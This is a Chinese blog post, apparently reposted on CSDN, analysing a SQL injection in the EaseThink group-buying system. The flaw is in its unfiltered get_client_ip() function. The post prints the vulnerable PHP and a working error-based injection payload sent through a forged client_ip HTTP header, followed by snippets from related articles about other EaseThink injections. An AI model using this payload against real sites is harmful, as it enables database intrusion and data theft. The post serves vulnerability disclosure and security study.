易想团购 注入 user.php,易想团购系统通杀SQL注入漏洞分析及利用

最新推荐文章于 2021-08-06 10:51:09 发布
最新推荐文章于 2021-08-06 10:51:09 发布
阅读量256 收藏
点赞数
文章标签: 易想团购 注入 user.php
作者发现易想团购系统中的get_client_ip函数存在未过滤用户输入漏洞,通过伪造HTTP头注入攻击。文章详细描述了利用过程,并指出已在系统中找到多处使用此函数的位置。涉及ThinkPHP框架的安全问题值得开发者警惕。
摘要由CSDN通过智能技术生成

*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。

刚打开红黑看到基友写的一个{易想团购系统 最新版 通杀}的文章,看他贴的代码里面有个get_client_ip()函数,哈哈,我猜没过滤,果断下了一套程序。

找到get_client_ip()函数:

// 获取客户端IP地址

function get_client_ip(){

if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))

$ip = getenv("HTTP_CLIENT_IP");

else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))

$ip = getenv("HTTP_X_FORWARDED_FOR");

else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))

$ip = getenv("REMOTE_ADDR");

else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))

$ip = $_SERVER['REMOTE_ADDR'];

else

$ip = "unknown";

return($ip);

}

果然没过滤,看了下很多地方用到这个函数。

比如:

if($_REQUEST['act'] == 'verify')

{

$id = intval($_REQUEST['id']);

$user_info = $GLOBALS['db']->getRow("select * from ".DB_PREFIX."user where id = ".$id);

if(!$user_info)

{

showErr($GLOBALS['lang']['NO_THIS_USER']);

}

$verify = $_REQUEST['code'];

if($user_info['verify'] == $verify)

{

//成功

$_SESSION['user_info'] = $user_info;

$GLOBALS['db']->query("update ".DB_PREFIX."user set login_ip = '".get_client_ip()."',login_time= ".get_gmtime().",verify = '',is_effect = 1 where id =".$user_info['id']);

$GLOBALS['db']->query("update ".DB_PREFIX."mail_list set is_effect = 1 where mail_address ='".$user_info['email']."'");

$GLOBALS['db']->query("update ".DB_PREFIX."mobile_list set is_effect = 1 where mobile ='".$user_info['mobile']."'");

showSuccess($GLOBALS['lang']['VERIFY_SUCCESS'],0,APP_ROOT."/");

}

团购系统嘛,其实不用看代码,登陆的这些地方必定会用这个函数。

果断的,登陆的时候在http头里面加了个client_ip,值为127′

看图:

f590df0b94732840273d3ae534367176.png

报错注入,很简单吧,

exp:

火狐插件增加client_ip头部,对应值为

‘ and (select * from (select count(*),concat(floor(rand(0)*2),(select user()))a from information_schema.tables group by a)b)#

a727ab671c6490c29adc241f2625a022.png

这套程序用的thinkphp的框架,回头看看有没有代码执行。

感谢Seay投递

某不知名书店店长
关注
易想团购系统 1.4.rar
05-24
易想团购管理系统是一套定位中高端市场的团购内容管理系统,能够以最低的成本,最少的人力投入在最短的时间架设一个功能齐全、性能优异、规模庞大并易于维护的网站平台。 易想团购系统 1.4 更新内容: 1.修正服务器不支持json时的json兼容函数 2.修正团购预告列表,时间显示为团购开始时间 3.修改购买时可先添加购物车,结算时登录 4.修正分享到XXX IE6乱码的问题 5.支付响应以及队列发送的BUG 安装说明: 1.安装环境需求:IIS/Apache PHP5 MySQL4/5  2.初次安装程序,将程序上传至web服务器,根据安装界面的示完成系统的安装。 3.安装成功后可删除 install 目录, 后台管理的文件为 admin.php, 如果担心后台地址的泄漏,可直接将该文件改名,同时访问改名后的文件 4.后台默认管理员的帐户为: admin 密码: admin 5.前台的演示用户帐户为: easethink 密码: easethink 6.如要使用伪静态,可在后台开启伪静态功能,需要服务器对rewriter的支持
易想(PHP)团购系统 v1.0.rar
07-09
易想团购系统商业版v1.0 主要功能列表 1. 团购分类:可为团购分类设置从属关联 2. 供应商帐户管理:可为每个供应商设置多个子帐户,用于确认团购券的操作,系统会自动记录xx团购券由xx商户的xx管理员进行操作。 3. ...
易想团购系统通杀SQL注入漏洞分析利用
代码析构师的专栏
05-12 758
刚打开红黑看到基友写的一个{易想团购系统 最新版 通杀}的文章,看他贴的代码里面有个get_client_ip()函数,哈哈,我猜没过滤,果断下了一套程序。 找到get_client_ip()函数: // 获取客户端IP地址 function get_client_ip(){ if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTT
易想团购 注入 user.php,易想购物(easethink)存在sql注入漏洞,附利用测试POC
weixin_34556619的博客
04-10 168
漏洞概要缺陷编号:WooYun-2013-022023漏洞标题:易想购物(easethink)存在sql注入漏洞,附利用测试POC相关厂商:易想购物漏洞作者:lxsec提交时间:2013-04-17 15:06公开时间:2013-07-16 15:06漏洞类型:SQL注射漏洞危害等级:中自评Rank:10漏洞状态:未联系到厂商或者厂商积极忽略Tags标签:漏洞详情披露状态:2013-04-17: ...
易想团购 注入 user.php,易想(easethink)团购系统ajax文件导致SQL注入漏洞
weixin_35713824的博客
04-10 368
发布时间:2013-04-18 关键词:easethink易想团购 ajaxsql注入易想团购管理系统是一套定位中高端市场的团购内容管理系统,能够以最低的成本,最少的人力投入在最短的时间架设一个功能齐全、性能优异、规模庞大并易于维护的网站平台。在注册界面,输入用户名后台会验证用户名是否存在,这里是通过ajax去验证,目前很多程序都会忽略这里的过滤而导致SQL注入。system\libs\user...
ajax漏洞 sql注入,易想团购ajax.php SQL注入分析和Exp漏洞预警 -电脑资料
weixin_29696999的博客
08-06 501
在注册的时候,输入用户名后台会验证用户名是否存在,当然是通过ajax去验证的也就是ajax.php,* 验证会员数据 */ function check_user($field_name,$field_data) { //开始数据验证 $user_data[$field_name] = $field_data; $res = array('status'=>1,'info'=>'',...
易想团购系统1.2版最新版
05-20
综合以上分析易想团购系统1.2版具备完整的团购流程管理,包括购物车、用户管理、订单处理、优惠券功能,并且提供了API接口,便于与其他系统集成。此外,开源的特性使得它对开发者友好,可以根据需求进行二次开发和...
免费版易想团购系统
05-24
【标题】:“免费版易想团购系统” 在IT行业中,团购系统是一种常见的电子商务平台,它允许用户以集体购买的方式获取商品或服务的折扣。"易想团购系统"是一款专为此目的设计的软件解决方案,尤其值得一提的是,这个...
易想会员管理营销系统源代码
03-18
易想会员管理营销系统是我司历时两年打造一款B/S结构商业会员系统,技术架构为PHP+MYSQL,系统功能涵盖了会员线上线下一体化、线上电子商务、门店、会员卡、线上线下充值、消费、积分、优惠券等功能,专门为商家或...
易想(easethink)团购系统ajax文件导致SQL注入漏洞
收集盒 Book box
04-20 962
发布时间:2013-04-18  关键词:easethink 易想团购 ajax sql注入 易想团购管理系统是一套定位中高端市场的团购内容管理系统,能够以最低的成本,最少的人力投入在最短的时间架设一个功能齐全、性能优异、规模庞大并易于维护的网站平台。 在注册界面,输入用户名后台会验证用户名是否存在,这里是通过ajax去验证,目前很多程序都会忽略这里的过滤而导致SQL注入
易想团购源码
01-04
易想团购源码
易想团购 注入 user.php,最新易想团购系统通杀SQL注入漏洞分析利用exp
weixin_42365898的博客
04-10 161
作者:Seay刚打开红黑看到J8基友写的一个{易想团购系统 最新版 通杀}的文章,看他贴的代码里面有个get_client_ip()函数,哈哈,我猜没过滤,果断下了一套程序。找到get_client_ip()函数。// 获取客户端IP地址function get_client_ip(){if (getenv("HTTP_CLIENT_IP") && strcasecmp(geten...
最新易想团购系统通杀SQL注入漏洞分析利用exp
收集盒 Book box
04-20 997
刚打开红黑看到J8基友写的一个{易想团购系统 最新版 通杀}的文章,看他贴的代码里面有个get_client_ip()函数,哈哈,我猜没过滤,果断下了一套程序。 找到get_client_ip()函数。 // 获取客户端IP地址 function get_client_ip(){ if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTT
易想团购 注入 user.php,易想团购系统通杀SQL注入漏洞分析利用漏洞预警 -电脑资料...
weixin_28918553的博客
04-10 127
刚打开红黑看到J8基友写的一个{易想团购系统 最新版 通杀}的文章,看他贴的代码里面有个get_client_ip()函数,哈哈,我猜没过滤,果断下了一套程序,找到get_client_ip()函数。// 获取客户端IP地址function get_client_ip(){ if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("H...
易想团购 注入 user.php,PHPCMS 2008 c.php存在referer sql注入及修复方案
weixin_34729012的博客
04-10 269
require './ads/include/common.inc.php';require 'f.php'; //此处为我加入的 防止 referer 攻击的代码,再下面 会介绍 f.php$id = intval($id);$ads = $c_ads->get_info($id);if($ads){$db->query("UPDATE ".DB_PRE."ads SET `cl...
易想团购 注入 user.php,易想团购ajax.php SQL注入分析和Exp
weixin_33245735的博客
04-10 226
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。在注册的时候,输入用户名后台会验证用户名是否存在,当然是通过ajax去验证的也就是ajax.php。很多程序多会忽略这个导致存在SQL注入。* 验证会员数据*/function check_user($field_name,$field_data){//开始数据验证$user_dat...
基于深度学习的行人分类.zip
09-21
深度学习是机器学习的一个子领域,它基于人工神经网络的研究,特别是利用多层次的神经网络来进行学习和模式识别。深度学习模型能够学习数据的高层次特征,这些特征对于图像和语音识别、自然语言处理、医学图像分析等应用至关重要。以下是深度学习的一些关键概念和组成部分: 1. **神经网络(Neural Networks)**:深度学习的基础是人工神经网络,它是由多个层组成的网络结构,包括输入层、隐藏层和输出层。每个层由多个神经元组成,神经元之间通过权重连接。 2. **前馈神经网络(Feedforward Neural Networks)**:这是最常见的神经网络类型,信息从输入层流向隐藏层,最终到达输出层。 3. **卷积神经网络(Convolutional Neural Networks, CNNs)**:这种网络特别适合处理具有网格结构的数据,如图像。它们使用卷积层来提取图像的特征。 4. **循环神经网络(Recurrent Neural Networks, RNNs)**:这种网络能够处理序列数据,如时间序列或自然语言,因为它们具有记忆功能,能够捕捉数据中的时间依赖性。 5. **长短期记忆网络(Long Short-Term Memory, LSTM)**:LSTM 是一种特殊的 RNN,它能够学习长期依赖关系,非常适合复杂的序列预测任务。 6. **生成对抗网络(Generative Adversarial Networks, GANs)**:由两个网络组成,一个生成器和一个判别器,它们相互竞争,生成器生成数据,判别器评估数据的真实性。 7. **深度学习框架**:如 TensorFlow、Keras、PyTorch 等,这些框架提供了构建、训练和部署深度学习模型的工具和库。 8. **激活函数(Activation Functions)**:如 ReLU、Sigmoid、Tanh 等,它们在神经网络中用于添加非线性,使得网络能够学习复杂的函数。 9. **损失函数(Loss Functions)**:用于评估模型的预测与真实值之间的差异,常见的损失函数包括均方误差(MSE)、交叉熵(Cross-Entropy)等。 10. **优化算法(Optimization Algorithms)**:如梯度下降(Gradient Descent)、随机梯度下降(SGD)、Adam 等,用于更新网络权重,以最小化损失函数。 11. **正则化(Regularization)**:技术如 Dropout、L1/L2 正则化等,用于防止模型过拟合。 12. **迁移学习(Transfer Learning)**:利用在一个任务上训练好的模型来提高另一个相关任务的性能。 深度学习在许多领域都取得了显著的成就,但它也面临着一些挑战,如对大量数据的依赖、模型的解释性差、计算资源消耗大等。研究人员正在不断探索新的方法来解决这些问题。
机械制造工艺学课程设计手柄座设计“手柄座”零件的机械加工工艺规程及工艺装备.doc
最新发布
09-21
机械制造工艺学课程设计手柄座设计“手柄座”零件的机械加工工艺规程及工艺装备.doc
易想数据库表结构详解
"易想数据库说明书提供了数据库设计的详细字段说明,涵盖了多个表格,包括管理员、登录日志、广告管理、文章、文章频道等多个业务相关的表。" 在易想数据库中,管理员表(yxs_administrators)是关键的一环,它包含...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值